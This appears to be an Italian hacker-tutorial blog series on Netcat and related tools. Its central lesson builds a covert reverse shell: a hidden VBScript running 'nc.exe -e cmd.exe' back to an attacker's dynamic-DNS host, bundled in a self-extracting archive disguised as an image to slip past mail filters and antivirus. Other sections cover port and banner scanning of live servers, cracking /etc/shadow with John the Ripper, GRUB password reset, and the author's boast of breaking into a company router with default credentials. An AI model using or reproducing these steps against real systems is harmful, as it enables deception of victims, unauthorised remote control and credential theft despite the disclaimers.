SOU

Con questo articolo iniziamo la fase finale dello studio dell’ uso di Netcat mirato alle finalita’ per gli altri usi vi rimando alle numerose guide presenti su INTERNET o alla man page del programma bene detto questo partiamo:
per prima cosa definiamo che cos’è un REVERSE SHELL: è un ATTACCO (quindi createvi una vostra LAN e ricordate che se anche attaccate il vostro sito,il vostro spazio mail ecc IL SERVER RICONOSCERA’ IL VOSTRO ACCESSO COME QUELLO DI UN INTRUSO E QUINDI VI FANNO …ci siamo capiti)
in cui è il computer TARGET che si COLLEGA al pc ATTACKER , fornendogli un prompt dei comandi con privilegio ROOT facendogli bypassare il login eventuale,un firewall od un router concorderete con me che questo sia l’ attacco con netcat che ogni pentester o investigatore debba saper portare per introdursi in un pc ma non è di facile intuizione ecco perchè procederemo piano piano.
Rieccoci a voi per entrare nel vivo cominciamo con il preparare il kit dei tools che ci servono per attaccare un sistema con netcat e la tecnica REVERSE SHELL :

1) NETCAT (alias nc.exe )
2) WINRAR ( serve per creare i famigerati ARCHIVI AUTOESTRAENTI e nascondere il file nc.exe alle rilevazioni del provider e degli Antivirus)
3) REG.EXE ( software utility di editazione del registro di sistema di windows a riga di comando)
4) Webget ( network utility per scaricare file o interi siti via http o ftp da riga di comando per LINUX usiamo WGET.exe).

Ora eseguiremo delle operazioni volte alla preparazione del nostro pc :

1) iscrizione ad un servizio di DNS dinamici (tipo DYNDNS) necessaria per poter ritrovare il nostro IP in internet senza dover ogni volta andare a controllare il nostro IP pubblico( che cambia, di tanto in tanto, essendo un IP dinamico).
se vogliamo usare DYNDNS rechiamoci a questo indirizzo :

http://www.dyndns.org

effettuiamo l’ iscrizione.

2) Recarsi in MY SERVICES e cliccare il link ADD HOSTNAME vicino alla sezione HOST SERVICES.

3)scegliamo un DOMINIO di TERZO LIVELLO:
dal menu a tendina sulla destra scegliere un suffisso dyndns.org,blogsite.org,ecc.ecc la scelta è vostra.

4) stabilire un PREFISSO che stara’ prima del suffisso esempio:
se scelgo :
suffisso = blogsite.org e prefisso = shell
avro’:
shell.blogsite.org… facile no!

5) Cliccate sul link USE AUTO DETECTED IP ADDRESS x.x.x.x che c’è sotto.
Questo fara’ in modo che il dominio che si sta’ per creare puntera’ subito all’ indirizzo IP della vostra connessione ad internet.

6) Cliccate su CREATE HOST per CONFERMARE la creazione del vostro DNS dinamico.
NOTATE CHE IL SERVIZIO è GRATUITO!

Procediamo ora con l’ installazione DYNDNS UPDATER sul nostro PC
esso ci permettera’ di risincronizzare il nostro DOMINIO (shell.blogsite.org ) con l’IP assegnato dal nostro provider.

1) scaricare il client gratuito da :

http://www.dyndns.com/support/clients/

cliccando su DOWNLOAD NOW scarico DynUpSetup.exe.

1) Eseguiamo il SETUP del software
2) clicchiamo su NEXT
3) Usando UBUNTU non possiamo avvalerci dell’ avviamento automatico come servizio windows sinceramente non posso pero’ smentire che ci possa essere una possibilita’ usando WINE l’ emulatore dell’ ambiente windows su ubuntu quindi dovremmo avviare ogni volta il prog manualmente.
Al termine dell’ installazione,si aprira’ una schermata che vi chiede le informazioni sul vostro account DYNDNS cioè, username e paassword .
Inseriamo i dati e vedremo che il prog aggiungera’ il nome host SHELL.BLOGSITE.ORG all’ interno della finestra.
Clicchiamo il quadratino vicino al nome host per impostare la sincronizzazione.
Diamo OK e abbiamo terminato.
Ora scegliamo una porta che dovra’ servirci per effettuare la connessione cercando di scegliere porte comprese in un range da 40000 a 50000.
In modo tale da sviare sospetti e controlli.
scelta la porta la 42712 ci apprestiamo a preparare l’ARCHIVIO AUTOESTRAENTE da inviare al pc vittima per prima cosa scarichiamo dai seguenti siti i programmi che ci servono:

NC.EXE – http://joncraton.org/files/nc111nt.zip

Winrar – http://www.rarlab.com/rar/wrar380b4it.exe

REG.EXE – http://www.dynawell.com/download/reskitt/mi…win2000/reg.zip

WebGet – http://users.ugent.be/~bpuype/fetc…l=wget.exe

Creiamo una cartella su desktop chiamiamola REVSHELL copiamo gli eseguibili

nc.exe – reg.exe – wget.exe nella cartella REVSHELL

installiamo Winrar ….

Ora iniziamo a nascondere il nostro pacchetto all’ interno di uno VBScript cosi’ :

1) Apriamo BLOCCO NOTE di windows e scriviamo :

CODICE

Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “nc.exe -e cmd.exe shell.logsite.org42712″,0

salviamo il file come REVSHELL.vbs copiamolo nella cartella REVSHELL insieme agli altri file eseguibili.

Diamo ora una spiegazione di cio’ che fa’ il file batch in VBScript:

1) esegue nc.exe agganciandogli il prompt dei comandi della shell windows (cmd.exe)
2) Connette la shell attraverso cmd.exe al mio dominio shell.blogsite.org creato all’inizio su dyndns sulla porta 42712.
3) Tramite lo 0 (ZERO) alla fine eseguo il programma SENZA che la vittima veda la finestra ….
La creazione del pacchetto autoestraente ci serve per nascondere i nostri eseguibili in primis al provider di servizi mail il quale di default blocca eseguibili in arrivo sui suoi server e alla nostra vittima che deve aprire il nostro batch file convinta di cliccare su un file tipo jpg ma attivando anche il file server.
Uno ad uno clicchiamo con il tasto dx del mouse su i 3 file .exe e su quello .vbs e clicchiamo per ognuno “Aggiungi ad un archivio”.
si aprira’ la finestra di creazione archivi di Winrar.
Mettiamo un segnodi spunta su “Crea un archivio autoestraente”:

Nella prossima si continua!

netcat come portscanner noo non ci credo eh si fratello fai bene ad aprir le orecchie e a marcarti cio’ che sto per dirti:

1) apri il tuo terminale al prompt digita :

$ nc -vvn -z x.x.x.x 1-445 eppoi INVIO

cosa sono le x ma naturale vuoi che ti do’ un ip esistente cosi’ ti fanno il sedere a strisce se vuoi usare quello di libero fai pure io ti ho avvertito a parte che bussare ad una porta con una richiesta non è reato certo ma non farti venire in mente di usare certi programmi per far collassare il server a parte che dopo un certo numero di richieste ti disconnettono e tu non hai imparato nulla ripeto lo scopo di questa prima parte del corso sulle connessioni è quella di ricevere l’ ok dal server studiarne le risposte capire come vedremo tra poco a che serve conoscere certe informazioni ok speriamo allora guardate un po’ che mi ha risposto il server al quale mi sono collegato con NET :

TCP/445 microsoft-ds open
TCP/2000 cisco-sccp open

bè questa volta mi sono dimenticato di fare copia/incolla del risultato del terminale ma la risposta è di un server vivo ok detto questo cosa ho fatto:

1) apro il mio browser internet digito microsoft-ds cerca
e qui andate a cercarvi le risposte siate un po’ piu’ hacker e meno lamer ;
2)ho inserito il secondo risultato cisco-sccp e che è venuto fuori
be’ questo ve lo dico altrimenti pensate che è tutto fumo quello che dico bene che sulla porta 2000 del mio serverino c’è in funzione
un bel apparecchio hardware della cisco che si chiama skinny che tramite il suo protocollo permette il dialogo tra 2 unita’ una CISCO CALL MANAGER e l’altra CISCO VOIP che serve semplice vi dice nulla SKYPE ….
Conoscere quindi certi dati è IMPORTANTISSIMO perchè ci permettono di studiare il tipo di attacco per i nostri esperimenti da
PENTESTER .
Personalmente mi è capitato di imbattermi in fase di scanning di rete in ip che hanno risposto a scanning con dati che mi hanno portato ad individuare router debolmente protetti .
Un giorno mi sono imbattuto durante una fase di scanning di rete in
un IP che mi gustava ,me lo torturato un po’ e alla fine mi ha detto quello che mi ha permesso di avvicinarmi molto a quello che era diventato il mio obiettivo e cioè per farla breve sono entrato nel ROUTER si ho avuto accesso al suo pannello di controllo potevo manipolarlo come se era mio MA NON L’HO FATTO ho curiosato ho cancellato le mie tracce e sono uscito.
Tutto questo è stato possibile dal fatto che l’ admin dell’ azienda che usava quel router aveva cappellato in primis lasciando invariate username e password cioè erano quelle originarie date dalla fabbrica e io una volta saputo il nome dell apparato sono andato in internet ho trovato i dati d’accesso gli ho provati a inserire e sono entrato che culo vero….
se lo dite voi ciao alla prossima!

Per avere info sul sistema operativo che gestisce il nostro sistema vittima creiamo un file di testo che chiameremo header.txt,e lo salviamo su scrivania, di seguito ecco come preparare il file:

HEAD | HTTP |1.0
Host: www.pippo.it metti al posto di PIPPO devi mettere un nome o indirizzo IP di un server o provider di servizi internet….ok!!!!

tenere presente che alla fine del .it battere 2 volte invio poi SALVA CON NOME…
Aprire un terminale e portarci nella directory ove abbiamo salvato il file header qui digitiamo come si vede sotto:

richiesta tramite conoscenza del nome server :

sidius@sidius:~$ cd /home/sidius/Scrivania
sidius@sidius:~/Scrivania$ nc www.pippo.it 80 -vv < header.txt
pippo [x.x.x.x] 80 (www) open
HTTP/1.1 400 Bad Request
Date: Wed, 13 Jan 2010 12:50:29 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1

sent 39, rcvd 168

richiesta tramite indirizzo IP

sidius@sidius:~/Scrivania$ nc x.x.x.x. 80 -vv < header.txt
server.server.com [x.x.x.x] 80 (www) open
HTTP/1.1 400 Bad Request
Date: Wed, 13 Jan 2010 12:52:23 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.28 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=iso-8859-1

sent 39, rcvd 239

Ricordo che le connessioni sono reali pertanto gli ip sono stati volutamente criptati da x per ovvie ragioni ciao da sou !

manlius@damned:~$ nc x.x.x.x 110 -vv
x.x-intertainment.com [x.x.x.x] 110 (pop3) open
+OK Hello there.
user pippo
+OK Password required.

-ERR Invalid command.
quit
+OK Better luck next time.
sent 17, rcvd 93
sidius@sidius:~$

dopo aver dato input USER seguito da USERNAME posso usare un nome inventato tanto il server mi da’ la possibilità di procedere con l’autenticazione pero’ la passwd la devo sapere o mi manda a CASA quindi onde evitare stress digito:quit e chiudo la connessione…
AH! da notare che la password quando viene digitata non appare questo perchè LINUX a scopo di SICUREZZA impedisce la visualizzazione…ciao a presto!!!

Guardate bene ubuntuxiani:

sidius@sidius:~$ nc x.x.x.x 25
220-nome_server.com ESMTP xxxxxxx #1 Tue, 12 Jan 2010 20:40:31 +0100
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
quit
221 nome server.com closing connection
sidius@sidius:~$

Niente di meglio che la pratica per capire le cose allora installiamo il nostro netcat da synaptic poi ci troviamo un bel serverino in rete tramite un operazione di scanning… con che..!?! ma con sua maesta’ NMAP che..!?! non lo conoscete merd…ok tratteremo anche quello vedrete che facciamo tutto con calma ok..
Ah! le x sono per coprire la connessione vera non potevo mica fare pubblicità e cmq vedete quando bisogna fermarsi e come farlo bene.
quindi basta :
aver installato sul pc:

1) NETCAT versione linux
2) attivare un terminale
3) digitare al prompt nc indirizzo_ip server scannato in rete porta che deve essere open
4) INVIO e aspettare la risposta

Nota : dopo occorre sapere cosa fare cioè quali comandi usare per dialogare con il SERVER a occhio perchè comunque siete loggati e se fate cavolate vi pinzano quindi bussate presentatevi ma se non avete il PERMESSO non entrate
nella prossima ci colleghiamo via ftp e telnet e vediamo come saranno le risposte..stay with us

Questo è un prologo di allenamento che ci spiega come attuare una semplice connessione ad una macchina o meglio ad un servizio che è in ascolto su di una porta e che attende istruzioni per smistarle al sistema operativo capace di elaborarle.

SEMPLICE CONNESSIONE REMOTA TRA CLIENT DELLA STESSA RETE :
Introduciamo l’uso di NMAP nel nostro corso dove lo prendiamo perchè non impariamo a usare synaptic capito mi hai?
ok via!se non avete capito lasciate mail in un commento del blog e vi rispondero’….

sidius@sidius:~$ nmap -sV indirizzo ip vittima

Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-01 14:45 CET
Interesting ports on indirizzo ip vittima:
Not shown: 1713 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.552 seconds
Connettiamoci alla macchina vittima con FTP

sidius@sidius-desktop:~$ ftp indirizzo ip porta
Connected to indirizzo ip.

ora le due macchine sono connesse ma non possono interagire tra loro
occorre che la connessione avvenga tra appositi programmi che sono detti in gergo SERVER mentre quelli modificati per usi impropri sono detti TROJAN.
d’ora in poi non vi diro’ piu’ che connettersi ad un server es di un provider senza autorizzazione è una violazione ed è reato ecc ecc…
Nella prossima lezione vedremo di spiegare come connettersi tramite un server il famosissimo coltellino svizzero MR NETCAT !!!!

PREMESSA

Noi di Sou intendiamo per accesso remoto la possibilità di comandare a distanza un pc ubicato ovunque nel mondo partendo dalla cosa piu’ semplice cioè che i pc siano entrambi miei e che non debba commettere nessun tipo di violazione studio tranquillamente cosa si deve fare senza timori di incappare in qualche reato.
schematicamente come si realizza una connessione tra due pc distanti tra loro?
ad esempio con SSH,SAMBA, creando una VPN diciamo che essenzialmente le connessioni si stabiliscono installando su ogni macchina programmi detti SERVER e su questo principio che nel tempo questi programmi si sono evoluti in armi informatiche pericolosissime cioè in quelli che definiamo TROJAN .
Partendo dal pressupposto che le violazioni che compirete sono su PC appartenenti a LAN vostre attuerete veri e propri attacchi hacker in completo RELAX ..
Esiste anche la possibilita’ per la verita’ di tentare un attacco detto BRUTE FORCE tramite programmi appositi che mirano a trovare la password del sistema da violare tramite algoritmi ma l’arte è quella di lavorare sui protocolli di comunicazione spoofare sniffare insomma farsi il mazzo…e alla fine si spera sentirsi finalmente hacker …ma non è facile per una falla che si trova una toppa si crea quindi bisogna aggiornarsi sempre e studiare di continuo a presto stay with us !!!!

ACCESSO DIRETTO AD UN SISTEMA UBUNTU

Si ha quando è possibile avere accesso alla macchina e
quindi alla tastiera ad essa collegata.

Questo sistema ci serve spesso nel caso in cui si dimentichi la
password di sistema( pena FORMATTAZIONE DEL SISTEMA e NUOVA INSTALLAZIONE)
quindi in questo caso e del tutto lecito
usare questa tecnica sulla propria macchina o dietro consenso
di chi c’è l’ho richiede ogni altro uso è un abuso ed è punibile per legge

detto questo entriamo nel vivo della procedura :

1) Avviamo la macchina in cui vogliamo introdurci opsss!appare il box di login
fine della corsa diresti tu e qui entra in gioco l’ investigatore informatico;

2) Egli tramite il pulsante OPZIONI>Riavvia eseguo un riavvio della macchina

3)Qui dovete aprire gli occhi perchè nella fase di boot del sistema compare in basso
allo schermo la parola GRUB ed è in questo momento che dovrete
PREMERE il tasto ESC sulla tastiera per visualizzare il menu di AVVIO.

4)Selezionare la voce relativa al RIPRISTINO di SISTEMA

5)Apparirà una shell di comando (ROOT);

6)DIGITIAMO dopo il prompt il seguente comando:

$ passwd

7)Seguiamo le istruzioni date per creare una nuova passord e trascriviamola su carta

8)Infine Riavviamo il sistema con questo comando:

$ reboot

Ora possiamo accedere al sistema senza aver perso dati o che vien da se’ che questa
tecnica è importantissima qualora qualcuno ci faccia uno scherzo e ci cambi password
in qualunque momento per noi sara’ facile tornare in possesso delle informazioni
presenti nella nostrta macchina.

nda per i newbies… i comandi digitati nella shell vanno inviati al sistema tramite il tasto ENTER = INVIO

CIAO e alle prossime!!

PREMESSA

VIOLARE LE SICUREZZE DI UN SISTEMA INFORMATICO E’ PUNIBILE AI SENSI DI LEGGE CREARSI UNA RETE CASALINGA E DIVERTIRSI IMPARANDO E’ CIO’ CHE CONSIGLIAMO NOI DI SOU MANLEVANDOCI DA OGNI RESPONSABILITA’ DERIVATA DALL’ USO IMPROPRIO FATTO DEL MATERIALE PRODOTTO NELLE LEZIONI.
Recupeare la password con John the Ripper :

Questa sezione contiene delle istruzioni utili al recupero delle password dimenticate con John the Ripper.
Installazione

Installare il pacchetto john presente nei repository ufficiali.
Utilizzo

Aprire una finestra di terminale e digitare il seguente comando:

sudo unshadow /etc/passwd /etc/shadow > passwd.test

Il precedente comando converte i file contenenti le informazioni sugli utenti e sulle password in un formato leggibile da John the Ripper, salvando il risultato nel file ~/passwd.test. Per avviare la ricerca delle password nel file appena creato è sufficiente digitare il seguente comando in una finestra di terminale:

john ~/passwd.test

NOTA – questo avviene con possibilita di aver accesso al terminale
del pc ma come si fa’ a scavalcare le password di accesso di un sistema ubuntu? lo saprete alla prossima lezione!!!

Ecco come connettermi da remoto con SSH per utilizzare ad esempio un’ applicazione grafica che gira su un’ altro PC :

da terminale digito:

$ ssh -X nome_utente pc remoto ———INVIO

è probabile che alla prima connessione si visualizzi un messaggio digitate :

YES ________INVIO

vi verra’ chiesta una password del pc remoto digitatela e
avrete a disposizione la shell di comando del pc remoto nella quale digitare i comandi che piu’ ci interessano.
RICORDIAMO CHE L’ USO NON AUTORIZZATO DI UNA CONNESSIONE REMOTA E’ PUNIBILE DALLA LEGGE.